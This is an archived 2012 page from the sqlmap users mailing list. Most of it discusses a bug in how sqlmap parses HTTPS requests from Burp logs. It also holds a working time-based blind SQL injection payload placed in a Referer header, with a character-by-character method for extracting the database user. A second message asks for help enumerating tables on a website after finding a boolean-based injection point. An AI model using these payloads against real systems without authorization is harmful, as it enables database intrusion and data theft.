sqlmap-users Mailing List for sqlmap (Page 49)
Brought to you by:
inquisb
Menu
▾
▴
sqlmap-users — sqlmap users mailing list
You can subscribe to this list here.
| 2008 |
Jan
|
Feb
|
Mar
|
Apr
|
May
|
Jun
|
Jul
|
Aug
|
Sep
(4) |
Oct
(11) |
Nov
(24) |
Dec
(13) |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 2009 |
Jan
(23) |
Feb
(17) |
Mar
(13) |
Apr
(48) |
May
(22) |
Jun
(18) |
Jul
(22) |
Aug
(13) |
Sep
(23) |
Oct
(6) |
Nov
(11) |
Dec
(25) |
| 2010 |
Jan
(21) |
Feb
(33) |
Mar
(61) |
Apr
(47) |
May
(48) |
Jun
(30) |
Jul
(24) |
Aug
(37) |
Sep
(52) |
Oct
(59) |
Nov
(32) |
Dec
(57) |
| 2011 |
Jan
(166) |
Feb
(93) |
Mar
(65) |
Apr
(117) |
May
(87) |
Jun
(124) |
Jul
(102) |
Aug
(78) |
Sep
(65) |
Oct
(22) |
Nov
(71) |
Dec
(79) |
| 2012 |
Jan
(93) |
Feb
(55) |
Mar
(45) |
Apr
(49) |
May
(56) |
Jun
(93) |
Jul
(95) |
Aug
(42) |
Sep
(26) |
Oct
(36) |
Nov
(32) |
Dec
(46) |
| 2013 |
Jan
(36) |
Feb
(78) |
Mar
(38) |
Apr
(57) |
May
(35) |
Jun
(39) |
Jul
(23) |
Aug
(33) |
Sep
(28) |
Oct
(38) |
Nov
(22) |
Dec
(16) |
| 2014 |
Jan
(33) |
Feb
(23) |
Mar
(41) |
Apr
(29) |
May
(12) |
Jun
(20) |
Jul
(21) |
Aug
(23) |
Sep
(18) |
Oct
(34) |
Nov
(12) |
Dec
(39) |
| 2015 |
Jan
(2) |
Feb
(51) |
Mar
(10) |
Apr
(28) |
May
(9) |
Jun
(22) |
Jul
(32) |
Aug
(35) |
Sep
(29) |
Oct
(50) |
Nov
(8) |
Dec
(2) |
| 2016 |
Jan
(8) |
Feb
(2) |
Mar
(3) |
Apr
(14) |
May
|
Jun
|
Jul
|
Aug
(12) |
Sep
|
Oct
|
Nov
(1) |
Dec
(19) |
| 2017 |
Jan
|
Feb
(18) |
Mar
|
Apr
(1) |
May
|
Jun
|
Jul
|
Aug
(4) |
Sep
|
Oct
|
Nov
(2) |
Dec
|
| 2018 |
Jan
|
Feb
|
Mar
(1) |
Apr
(1) |
May
(3) |
Jun
|
Jul
|
Aug
|
Sep
|
Oct
|
Nov
|
Dec
|
| 2019 |
Jan
|
Feb
|
Mar
|
Apr
(3) |
May
|
Jun
|
Jul
|
Aug
|
Sep
|
Oct
|
Nov
|
Dec
|
|
From: Dennis <kor...@ya...> - 2012-10-09 09:12:23
|
Hey, burp acts as you suspected. Here's an example of https://google.de logged from a burp pro v1.4.12: ====================================================== 11:05:56 https://www.google.de:443 [173.194.35.184] ====================================================== GET / HTTP/1.1 Host: www.google.de User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate DNT: 1 Connection: keep-alive Cookie: xxx Pragma: no-cache Cache-Control: no-cache ====================================================== The same goes for burp's "Copy to File" feature. I usually use the --force-ssl flag to circumvent this. Cheers, Dennis Am 09.10.2012 10:49, schrieb Miroslav Stampar: > Hi again. > > It's a preamble, but the request itself is down below. We process > requests, not preambles. As we need to support generic LOG files, we > are "hunting" for requests itself. > > If somebody could confirm that Burp really strips any HTTPS "tips" > from the requests and just puts those in preambles (like in your > case), I'll gladly do the "patching". > > Kind regards, > Miroslav Stampar > > On Tue, Oct 9, 2012 at 10:44 AM, Karel Marhoul <rez...@se... > <mailto:rez...@se...>> wrote: > > Hello Miroslav, there is a mention of port 443 in the request > "preamble", see: > > > ====================================================== > > 12:40:22 https://www.xxx.cz:443 [81.91.80.92] > > ====================================================== > > That specific request came from HTTPS page and landed toward HTTP, > I'm sure of that. > > I suggest sqlmap log parser should first look at the port in the > request preamble and then send the request to this port - is that > possible to implement? > > Regards > > Karel > > On 9.10.2012 10:30, Miroslav Stampar wrote: > > Hi Karel. > > Strictly speaking there is no bug here. If you take a look > carefully > into the HTTP request inside you'll see that there is no > mention of > either HTTPS nor 443 inside the request itself. It seems like the > request came from the https page (referer header), but landed > toward the > HTTP land. > > I would suggest you to just try to append the :443 to the Host > header > value (Host: www.xxx.cz <http://www.xxx.cz> > <http://www.xxx.cz> -> Host: www.xxx.cz:443 > <http://www.xxx.cz:443> > <http://www.xxx.cz:443>) > > Kind regards, > Miroslav Stampar > > On Sun, Oct 7, 2012 at 1:37 PM, Karel Marhoul > <rez...@se... <mailto:rez...@se...> > <mailto:rez...@se... <mailto:rez...@se...>>> > wrote: > > Hello, I came across a bug while using sqlmap with -l > parameter. I have > burp log file with following content (only one request to > https port): > > ====================================================== > 12:40:22 https://www.xxx.cz:443 [81.91.80.92] > ====================================================== > GET > > /index.php?option=com_thumber&view=thumb&format=image&path=images/cups/web-xxx-klub_ikona-spion.jpg&newX=160&newY=120 > HTTP/1.1 > Host: www.xxx.cz <http://www.xxx.cz> <http://www.xxx.cz> > User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) > Gecko/20100101 > Firefox/15.0.1 > Accept: image/png,image/*;q=0.8,*/*;q=0.5 > Accept-Language: en-us,en;q=0.5 > Accept-Encoding: gzip, deflate > Connection: keep-alive > Referer: https://www.xxx.cz/ > Cookie: > __utma=148540003.1998141124.1349164485.1349423437.1349599213.20; > > __utmz=148540003.1349164485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); > theme_cookie=life; > e6da1f1e61cfd387eff8fb211613796e=3c29965kggoo45p49dhrs1npq0; > __utmc=148540003 > Cache-Control: max-age=0 > > ====================================================== > > Then I start sqlmap this way: > > ./sqlmap.py -l /root/burp.log --batch --threads=10 > --scope=www.xxx.cz <http://www.xxx.cz> <http://www.xxx.cz> > > And sqlmap instead of sending request to https (443) port > it will use > http (80) port instead: > > --------------------------------------------------------- > [13:21:55] [INFO] using regular expression 'www.xxx.cz > <http://www.xxx.cz> > <http://www.xxx.cz>' for filtering > targets > [13:21:55] [INFO] sqlmap parsed 1 testable requests from > the targets > list > [13:21:55] [INFO] url 1: > GET > > http://www.xxx.cz:80/index.php?option=com_thumber&view=thumb&format=image&path=images/cups/web-xxx-klub_ikona-spion.jpg&newX=160&newY=120 > Cookie: > __utma=148540003.1998141124.1349164485.1349423437.1349599213.20; > > __utmz=148540003.1349164485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); > theme_cookie=life; > e6da1f1e61cfd387eff8fb211613796e=3c29965kggoo45p49dhrs1npq0; > __utmc=148540003 > do you want to test this url? [Y/n/q] > > Y > [snip] > --------------------------------------------------------- > > Could you please fix this? > > Regards > > Karel Marhoul > > > ------------------------------------------------------------------------------ > Don't let slow site performance ruin your business. Deploy > New Relic APM > Deploy New Relic app performance management and know exactly > what is happening inside your Ruby, Python, PHP, Java, and > .NET app > Try New Relic at no cost today and get our sweet Data Nerd > shirt too! > http://p.sf.net/sfu/newrelic-dev2dev > _______________________________________________ > sqlmap-users mailing list > sql...@li... > <mailto:sql...@li...> > <mailto:sql...@li... > <mailto:sql...@li...>> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > > > > -- > Miroslav Stampar > http://about.me/stamparm > > > > > > -- > Miroslav Stampar > http://about.me/stamparm > > > ------------------------------------------------------------------------------ > Don't let slow site performance ruin your business. Deploy New Relic APM > Deploy New Relic app performance management and know exactly > what is happening inside your Ruby, Python, PHP, Java, and .NET app > Try New Relic at no cost today and get our sweet Data Nerd shirt too! > http://p.sf.net/sfu/newrelic-dev2dev > > > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users |
|
From: Karel M. <rez...@se...> - 2012-10-09 09:04:21
|
I could confirm this behavior with these versions of burp: Burp Suite Proffesional 1.4.12 Burp Suite Proffesional 1.5rc3 Patch would be appreciated. Regards Karel On 9.10.2012 10:49, Miroslav Stampar wrote: > Hi again. > > It's a preamble, but the request itself is down below. We process > requests, not preambles. As we need to support generic LOG files, we are > "hunting" for requests itself. > > If somebody could confirm that Burp really strips any HTTPS "tips" from > the requests and just puts those in preambles (like in your case), I'll > gladly do the "patching". > > Kind regards, > Miroslav Stampar > > On Tue, Oct 9, 2012 at 10:44 AM, Karel Marhoul <rez...@se... > <mailto:rez...@se...>> wrote: > > Hello Miroslav, there is a mention of port 443 in the request > "preamble", see: > > > ==============================__======================== > > 12:40:22 https://www.xxx.cz:443 [81.91.80.92] > > ==============================__======================== > > That specific request came from HTTPS page and landed toward HTTP, > I'm sure of that. > > I suggest sqlmap log parser should first look at the port in the > request preamble and then send the request to this port - is that > possible to implement? > > Regards > > Karel > > On 9.10.2012 10:30, Miroslav Stampar wrote: > > Hi Karel. > > Strictly speaking there is no bug here. If you take a look carefully > into the HTTP request inside you'll see that there is no mention of > either HTTPS nor 443 inside the request itself. It seems like the > request came from the https page (referer header), but landed > toward the > HTTP land. > > I would suggest you to just try to append the :443 to the Host > header > value (Host: www.xxx.cz <http://www.xxx.cz> <http://www.xxx.cz> > -> Host: www.xxx.cz:443 <http://www.xxx.cz:443> > <http://www.xxx.cz:443>) > > Kind regards, > Miroslav Stampar > > On Sun, Oct 7, 2012 at 1:37 PM, Karel Marhoul > <rez...@se... <mailto:rez...@se...> > <mailto:rez...@se... <mailto:rez...@se...>>> wrote: > > Hello, I came across a bug while using sqlmap with -l > parameter. I have > burp log file with following content (only one request to > https port): > > ==============================__======================== > 12:40:22 https://www.xxx.cz:443 [81.91.80.92] > ==============================__======================== > GET > > /index.php?option=com_thumber&__view=thumb&format=image&path=__images/cups/web-xxx-klub___ikona-spion.jpg&newX=160&newY=__120 > HTTP/1.1 > Host: www.xxx.cz <http://www.xxx.cz> <http://www.xxx.cz> > User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) > Gecko/20100101 > Firefox/15.0.1 > Accept: image/png,image/*;q=0.8,*/*;q=__0.5 > Accept-Language: en-us,en;q=0.5 > Accept-Encoding: gzip, deflate > Connection: keep-alive > Referer: https://www.xxx.cz/ > Cookie: > __utma=148540003.1998141124.__1349164485.1349423437.__1349599213.20; > > __utmz=148540003.1349164485.1.__1.utmcsr=(direct)|utmccn=(__direct)|utmcmd=(none); > theme_cookie=life; > e6da1f1e61cfd387eff8fb21161379__6e=3c29965kggoo45p49dhrs1npq0; > __utmc=148540003 > Cache-Control: max-age=0 > > ==============================__======================== > > Then I start sqlmap this way: > > ./sqlmap.py -l /root/burp.log --batch --threads=10 > --scope=www.xxx.cz <http://www.xxx.cz> <http://www.xxx.cz> > > And sqlmap instead of sending request to https (443) port > it will use > http (80) port instead: > > ------------------------------__--------------------------- > [13:21:55] [INFO] using regular expression 'www.xxx.cz > <http://www.xxx.cz> > <http://www.xxx.cz>' for filtering > targets > [13:21:55] [INFO] sqlmap parsed 1 testable requests from > the targets > list > [13:21:55] [INFO] url 1: > GET > http://www.xxx.cz:80/index.__php?option=com_thumber&view=__thumb&format=image&path=__images/cups/web-xxx-klub___ikona-spion.jpg&newX=160&newY=__120 > <http://www.xxx.cz:80/index.php?option=com_thumber&view=thumb&format=image&path=images/cups/web-xxx-klub_ikona-spion.jpg&newX=160&newY=120> > Cookie: > __utma=148540003.1998141124.__1349164485.1349423437.__1349599213.20; > > __utmz=148540003.1349164485.1.__1.utmcsr=(direct)|utmccn=(__direct)|utmcmd=(none); > theme_cookie=life; > e6da1f1e61cfd387eff8fb21161379__6e=3c29965kggoo45p49dhrs1npq0; > __utmc=148540003 > do you want to test this url? [Y/n/q] > > Y > [snip] > ------------------------------__--------------------------- > > Could you please fix this? > > Regards > > Karel Marhoul > > > ------------------------------__------------------------------__------------------ > Don't let slow site performance ruin your business. Deploy > New Relic APM > Deploy New Relic app performance management and know exactly > what is happening inside your Ruby, Python, PHP, Java, and > .NET app > Try New Relic at no cost today and get our sweet Data Nerd > shirt too! > http://p.sf.net/sfu/newrelic-__dev2dev > <http://p.sf.net/sfu/newrelic-dev2dev> > _________________________________________________ > sqlmap-users mailing list > sqlmap-users@lists.__sourceforge.net > <mailto:sql...@li...> > <mailto:sqlmap-users@lists.__sourceforge.net > <mailto:sql...@li...>> > https://lists.sourceforge.net/__lists/listinfo/sqlmap-users > <https://lists.sourceforge.net/lists/listinfo/sqlmap-users> > > > > > -- > Miroslav Stampar > http://about.me/stamparm > > > > > > -- > Miroslav Stampar > http://about.me/stamparm |
|
From: Miroslav S. <mir...@gm...> - 2012-10-09 08:49:22
|
Hi again. It's a preamble, but the request itself is down below. We process requests, not preambles. As we need to support generic LOG files, we are "hunting" for requests itself. If somebody could confirm that Burp really strips any HTTPS "tips" from the requests and just puts those in preambles (like in your case), I'll gladly do the "patching". Kind regards, Miroslav Stampar On Tue, Oct 9, 2012 at 10:44 AM, Karel Marhoul <rez...@se...> wrote: > Hello Miroslav, there is a mention of port 443 in the request "preamble", > see: > > > ==============================**======================== > > 12:40:22 https://www.xxx.cz:443 [81.91.80.92] > > ==============================**======================== > > That specific request came from HTTPS page and landed toward HTTP, I'm > sure of that. > > I suggest sqlmap log parser should first look at the port in the request > preamble and then send the request to this port - is that possible to > implement? > > Regards > > Karel > > On 9.10.2012 10:30, Miroslav Stampar wrote: > >> Hi Karel. >> >> Strictly speaking there is no bug here. If you take a look carefully >> into the HTTP request inside you'll see that there is no mention of >> either HTTPS nor 443 inside the request itself. It seems like the >> request came from the https page (referer header), but landed toward the >> HTTP land. >> >> I would suggest you to just try to append the :443 to the Host header >> value (Host: www.xxx.cz <http://www.xxx.cz> -> Host: www.xxx.cz:443 >> <http://www.xxx.cz:443>) >> >> Kind regards, >> Miroslav Stampar >> >> On Sun, Oct 7, 2012 at 1:37 PM, Karel Marhoul <rez...@se... >> <mailto:rez...@se...>> wrote: >> >> Hello, I came across a bug while using sqlmap with -l parameter. I >> have >> burp log file with following content (only one request to https port): >> >> ==============================**======================== >> 12:40:22 https://www.xxx.cz:443 [81.91.80.92] >> ==============================**======================== >> GET >> /index.php?option=com_thumber&**view=thumb&format=image&path=** >> images/cups/web-xxx-klub_**ikona-spion.jpg&newX=160&newY=**120 >> HTTP/1.1 >> Host: www.xxx.cz <http://www.xxx.cz> >> User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) >> Gecko/20100101 >> Firefox/15.0.1 >> Accept: image/png,image/*;q=0.8,*/*;q=**0.5 >> Accept-Language: en-us,en;q=0.5 >> Accept-Encoding: gzip, deflate >> Connection: keep-alive >> Referer: https://www.xxx.cz/ >> Cookie: __utma=148540003.1998141124.**1349164485.1349423437.** >> 1349599213.20; >> __utmz=148540003.1349164485.1.**1.utmcsr=(direct)|utmccn=(** >> direct)|utmcmd=(none); >> theme_cookie=life; >> e6da1f1e61cfd387eff8fb21161379**6e=3c29965kggoo45p49dhrs1npq0; >> __utmc=148540003 >> Cache-Control: max-age=0 >> >> ==============================**======================== >> >> Then I start sqlmap this way: >> >> ./sqlmap.py -l /root/burp.log --batch --threads=10 >> --scope=www.xxx.cz <http://www.xxx.cz> >> >> And sqlmap instead of sending request to https (443) port it will use >> http (80) port instead: >> >> ------------------------------**--------------------------- >> [13:21:55] [INFO] using regular expression 'www.xxx.cz >> <http://www.xxx.cz>' for filtering >> targets >> [13:21:55] [INFO] sqlmap parsed 1 testable requests from the targets >> list >> [13:21:55] [INFO] url 1: >> GET >> http://www.xxx.cz:80/index.**php?option=com_thumber&view=** >> thumb&format=image&path=**images/cups/web-xxx-klub_** >> ikona-spion.jpg&newX=160&newY=**120<http://www.xxx.cz:80/index.php?option=com_thumber&view=thumb&format=image&path=images/cups/web-xxx-klub_ikona-spion.jpg&newX=160&newY=120> >> Cookie: __utma=148540003.1998141124.**1349164485.1349423437.** >> 1349599213.20; >> __utmz=148540003.1349164485.1.**1.utmcsr=(direct)|utmccn=(** >> direct)|utmcmd=(none); >> theme_cookie=life; >> e6da1f1e61cfd387eff8fb21161379**6e=3c29965kggoo45p49dhrs1npq0; >> __utmc=148540003 >> do you want to test this url? [Y/n/q] >> > Y >> [snip] >> ------------------------------**--------------------------- >> >> Could you please fix this? >> >> Regards >> >> Karel Marhoul >> >> ------------------------------**------------------------------** >> ------------------ >> Don't let slow site performance ruin your business. Deploy New Relic >> APM >> Deploy New Relic app performance management and know exactly >> what is happening inside your Ruby, Python, PHP, Java, and .NET app >> Try New Relic at no cost today and get our sweet Data Nerd shirt too! >> http://p.sf.net/sfu/newrelic-**dev2dev<http://p.sf.net/sfu/newrelic-dev2dev> >> ______________________________**_________________ >> sqlmap-users mailing list >> sqlmap-users@lists.**sourceforge.net<sql...@li...> >> <mailto:sqlmap-users@lists.**sourceforge.net<sql...@li...> >> > >> https://lists.sourceforge.net/**lists/listinfo/sqlmap-users<https://lists.sourceforge.net/lists/listinfo/sqlmap-users> >> >> >> >> >> -- >> Miroslav Stampar >> http://about.me/stamparm >> > > -- Miroslav Stampar http://about.me/stamparm |
|
From: Karel M. <rez...@se...> - 2012-10-09 08:44:24
|
Hello Miroslav, there is a mention of port 443 in the request "preamble", see: > ====================================================== > 12:40:22 https://www.xxx.cz:443 [81.91.80.92] > ====================================================== That specific request came from HTTPS page and landed toward HTTP, I'm sure of that. I suggest sqlmap log parser should first look at the port in the request preamble and then send the request to this port - is that possible to implement? Regards Karel On 9.10.2012 10:30, Miroslav Stampar wrote: > Hi Karel. > > Strictly speaking there is no bug here. If you take a look carefully > into the HTTP request inside you'll see that there is no mention of > either HTTPS nor 443 inside the request itself. It seems like the > request came from the https page (referer header), but landed toward the > HTTP land. > > I would suggest you to just try to append the :443 to the Host header > value (Host: www.xxx.cz <http://www.xxx.cz> -> Host: www.xxx.cz:443 > <http://www.xxx.cz:443>) > > Kind regards, > Miroslav Stampar > > On Sun, Oct 7, 2012 at 1:37 PM, Karel Marhoul <rez...@se... > <mailto:rez...@se...>> wrote: > > Hello, I came across a bug while using sqlmap with -l parameter. I have > burp log file with following content (only one request to https port): > > ====================================================== > 12:40:22 https://www.xxx.cz:443 [81.91.80.92] > ====================================================== > GET > /index.php?option=com_thumber&view=thumb&format=image&path=images/cups/web-xxx-klub_ikona-spion.jpg&newX=160&newY=120 > HTTP/1.1 > Host: www.xxx.cz <http://www.xxx.cz> > User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 > Firefox/15.0.1 > Accept: image/png,image/*;q=0.8,*/*;q=0.5 > Accept-Language: en-us,en;q=0.5 > Accept-Encoding: gzip, deflate > Connection: keep-alive > Referer: https://www.xxx.cz/ > Cookie: __utma=148540003.1998141124.1349164485.1349423437.1349599213.20; > __utmz=148540003.1349164485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); > theme_cookie=life; > e6da1f1e61cfd387eff8fb211613796e=3c29965kggoo45p49dhrs1npq0; > __utmc=148540003 > Cache-Control: max-age=0 > > ====================================================== > > Then I start sqlmap this way: > > ./sqlmap.py -l /root/burp.log --batch --threads=10 > --scope=www.xxx.cz <http://www.xxx.cz> > > And sqlmap instead of sending request to https (443) port it will use > http (80) port instead: > > --------------------------------------------------------- > [13:21:55] [INFO] using regular expression 'www.xxx.cz > <http://www.xxx.cz>' for filtering > targets > [13:21:55] [INFO] sqlmap parsed 1 testable requests from the targets > list > [13:21:55] [INFO] url 1: > GET > http://www.xxx.cz:80/index.php?option=com_thumber&view=thumb&format=image&path=images/cups/web-xxx-klub_ikona-spion.jpg&newX=160&newY=120 > Cookie: __utma=148540003.1998141124.1349164485.1349423437.1349599213.20; > __utmz=148540003.1349164485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); > theme_cookie=life; > e6da1f1e61cfd387eff8fb211613796e=3c29965kggoo45p49dhrs1npq0; > __utmc=148540003 > do you want to test this url? [Y/n/q] > > Y > [snip] > --------------------------------------------------------- > > Could you please fix this? > > Regards > > Karel Marhoul > > ------------------------------------------------------------------------------ > Don't let slow site performance ruin your business. Deploy New Relic APM > Deploy New Relic app performance management and know exactly > what is happening inside your Ruby, Python, PHP, Java, and .NET app > Try New Relic at no cost today and get our sweet Data Nerd shirt too! > http://p.sf.net/sfu/newrelic-dev2dev > _______________________________________________ > sqlmap-users mailing list > sql...@li... > <mailto:sql...@li...> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > > > > -- > Miroslav Stampar > http://about.me/stamparm |
|
From: Miroslav S. <mir...@gm...> - 2012-10-09 08:30:31
|
Hi Karel. Strictly speaking there is no bug here. If you take a look carefully into the HTTP request inside you'll see that there is no mention of either HTTPS nor 443 inside the request itself. It seems like the request came from the https page (referer header), but landed toward the HTTP land. I would suggest you to just try to append the :443 to the Host header value (Host: www.xxx.cz -> Host: www.xxx.cz:443) Kind regards, Miroslav Stampar On Sun, Oct 7, 2012 at 1:37 PM, Karel Marhoul <rez...@se...> wrote: > Hello, I came across a bug while using sqlmap with -l parameter. I have > burp log file with following content (only one request to https port): > > ====================================================== > 12:40:22 https://www.xxx.cz:443 [81.91.80.92] > ====================================================== > GET > > /index.php?option=com_thumber&view=thumb&format=image&path=images/cups/web-xxx-klub_ikona-spion.jpg&newX=160&newY=120 > HTTP/1.1 > Host: www.xxx.cz > User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 > Firefox/15.0.1 > Accept: image/png,image/*;q=0.8,*/*;q=0.5 > Accept-Language: en-us,en;q=0.5 > Accept-Encoding: gzip, deflate > Connection: keep-alive > Referer: https://www.xxx.cz/ > Cookie: __utma=148540003.1998141124.1349164485.1349423437.1349599213.20; > > __utmz=148540003.1349164485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); > theme_cookie=life; > e6da1f1e61cfd387eff8fb211613796e=3c29965kggoo45p49dhrs1npq0; > __utmc=148540003 > Cache-Control: max-age=0 > > ====================================================== > > Then I start sqlmap this way: > > ./sqlmap.py -l /root/burp.log --batch --threads=10 --scope=www.xxx.cz > > And sqlmap instead of sending request to https (443) port it will use > http (80) port instead: > > --------------------------------------------------------- > [13:21:55] [INFO] using regular expression 'www.xxx.cz' for filtering > targets > [13:21:55] [INFO] sqlmap parsed 1 testable requests from the targets list > [13:21:55] [INFO] url 1: > GET > > http://www.xxx.cz:80/index.php?option=com_thumber&view=thumb&format=image&path=images/cups/web-xxx-klub_ikona-spion.jpg&newX=160&newY=120 > Cookie: __utma=148540003.1998141124.1349164485.1349423437.1349599213.20; > > __utmz=148540003.1349164485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); > theme_cookie=life; > e6da1f1e61cfd387eff8fb211613796e=3c29965kggoo45p49dhrs1npq0; > __utmc=148540003 > do you want to test this url? [Y/n/q] > > Y > [snip] > --------------------------------------------------------- > > Could you please fix this? > > Regards > > Karel Marhoul > > > ------------------------------------------------------------------------------ > Don't let slow site performance ruin your business. Deploy New Relic APM > Deploy New Relic app performance management and know exactly > what is happening inside your Ruby, Python, PHP, Java, and .NET app > Try New Relic at no cost today and get our sweet Data Nerd shirt too! > http://p.sf.net/sfu/newrelic-dev2dev > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Miroslav Stampar http://about.me/stamparm |
|
From: Miroslav S. <mir...@gm...> - 2012-10-09 08:26:46
|
Hi Alton. Please update to the latest revision and run sqlmap with the: -p referer. Kind regards, Miroslav Stampar On Sun, Oct 7, 2012 at 11:25 PM, Alton Johnson <alt...@gm...> wrote: > In my situation, my vulnerable parameter is Referer in the HTTP > headers. I am able to enumerate the username and database name > manually, but can someone explain or point me to an article that gives > details about sqlmap and time-based with mysql? Here is an example of > how I was able to enumerate the name. I'm unsure if there's any > "custom" way of getting sqlmap work with this. > > Code: > GET /vulnwebapp/index.php?id=2 HTTP/1.1 > Host: 192.168.127.133 > Proxy-Connection: keep-alive > User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.4 (KHTML, > like Gecko) Chrome/22.0.1229.79 Safari/537.4 > Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 > Referer: '+IF(SUBSTRING(USER(),1,1)='r',SLEEP(5),1)+' > Accept-Encoding: gzip,deflate,sdch > Accept-Language: en-US,en;q=0.8 > Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 > > FYI, I'm testing this on a vulnerable web app hosted by myself. So > with the above request, the page sleeps because the first character of > the current username is "r", which eventually allows me to change 1,1 > to 2,1 and so forth until I figure out that the username is "root." > > Is there any way to get sqlmap to assist with this type of attack? > > Thanks, > > > ------------------------------------------------------------------------------ > Don't let slow site performance ruin your business. Deploy New Relic APM > Deploy New Relic app performance management and know exactly > what is happening inside your Ruby, Python, PHP, Java, and .NET app > Try New Relic at no cost today and get our sweet Data Nerd shirt too! > http://p.sf.net/sfu/newrelic-dev2dev > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Miroslav Stampar http://about.me/stamparm |
|
From: Alton J. <alt...@gm...> - 2012-10-07 21:25:13
|
In my situation, my vulnerable parameter is Referer in the HTTP headers. I am able to enumerate the username and database name manually, but can someone explain or point me to an article that gives details about sqlmap and time-based with mysql? Here is an example of how I was able to enumerate the name. I'm unsure if there's any "custom" way of getting sqlmap work with this. Code: GET /vulnwebapp/index.php?id=2 HTTP/1.1 Host: 192.168.127.133 Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.79 Safari/537.4 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: '+IF(SUBSTRING(USER(),1,1)='r',SLEEP(5),1)+' Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 FYI, I'm testing this on a vulnerable web app hosted by myself. So with the above request, the page sleeps because the first character of the current username is "r", which eventually allows me to change 1,1 to 2,1 and so forth until I figure out that the username is "root." Is there any way to get sqlmap to assist with this type of attack? Thanks, |
|
From: Miroslav S. <mir...@gm...> - 2012-10-07 17:46:31
|
Hi Kyle. You can find examples here [1] and here [2]. In short, in one run you'll need --tables to brute force table names and in other(s) --dump -T <table_name> to dump table of interest. Kind regards, Miroslav Stampar [1] http://unconciousmind.blogspot.com/2011/05/sqlmap-vs-testfire-testing-web-server.html [2] http://unconciousmind.blogspot.com/2011/05/sqlmap-vs-webappsecurity-testing-web.html On Fri, Oct 5, 2012 at 1:29 AM, kyle easter <kyl...@gm...> wrote: > I do not really know how to use SQL map on MS access backend. > > I'm trying to test a website, But I'm stuck here > > sqlmap identified the following injection points with a total of 20 > HTTP(s) requests: > --- > Place: GET > Parameter: id > Type: boolean-based blind > Title: AND boolean-based blind - WHERE or HAVING clause > Payload: id=32 AND 1922=1922 > > I would understand what to do if this was just a normal php server, and > bring up the tables but this obviously is not the same. > > Can someone please help me? > > kyl...@gm... > Regards! > > > ------------------------------------------------------------------------------ > Don't let slow site performance ruin your business. Deploy New Relic APM > Deploy New Relic app performance management and know exactly > what is happening inside your Ruby, Python, PHP, Java, and .NET app > Try New Relic at no cost today and get our sweet Data Nerd shirt too! > http://p.sf.net/sfu/newrelic-dev2dev > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar http://about.me/stamparm |
|
From: Karel M. <rez...@se...> - 2012-10-07 11:37:30
|
Hello, I came across a bug while using sqlmap with -l parameter. I have burp log file with following content (only one request to https port): ====================================================== 12:40:22 https://www.xxx.cz:443 [81.91.80.92] ====================================================== GET /index.php?option=com_thumber&view=thumb&format=image&path=images/cups/web-xxx-klub_ikona-spion.jpg&newX=160&newY=120 HTTP/1.1 Host: www.xxx.cz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Referer: https://www.xxx.cz/ Cookie: __utma=148540003.1998141124.1349164485.1349423437.1349599213.20; __utmz=148540003.1349164485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); theme_cookie=life; e6da1f1e61cfd387eff8fb211613796e=3c29965kggoo45p49dhrs1npq0; __utmc=148540003 Cache-Control: max-age=0 ====================================================== Then I start sqlmap this way: ./sqlmap.py -l /root/burp.log --batch --threads=10 --scope=www.xxx.cz And sqlmap instead of sending request to https (443) port it will use http (80) port instead: --------------------------------------------------------- [13:21:55] [INFO] using regular expression 'www.xxx.cz' for filtering targets [13:21:55] [INFO] sqlmap parsed 1 testable requests from the targets list [13:21:55] [INFO] url 1: GET http://www.xxx.cz:80/index.php?option=com_thumber&view=thumb&format=image&path=images/cups/web-xxx-klub_ikona-spion.jpg&newX=160&newY=120 Cookie: __utma=148540003.1998141124.1349164485.1349423437.1349599213.20; __utmz=148540003.1349164485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); theme_cookie=life; e6da1f1e61cfd387eff8fb211613796e=3c29965kggoo45p49dhrs1npq0; __utmc=148540003 do you want to test this url? [Y/n/q] > Y [snip] --------------------------------------------------------- Could you please fix this? Regards Karel Marhoul |
|
From: kyle e. <kyl...@gm...> - 2012-10-04 23:29:23
|
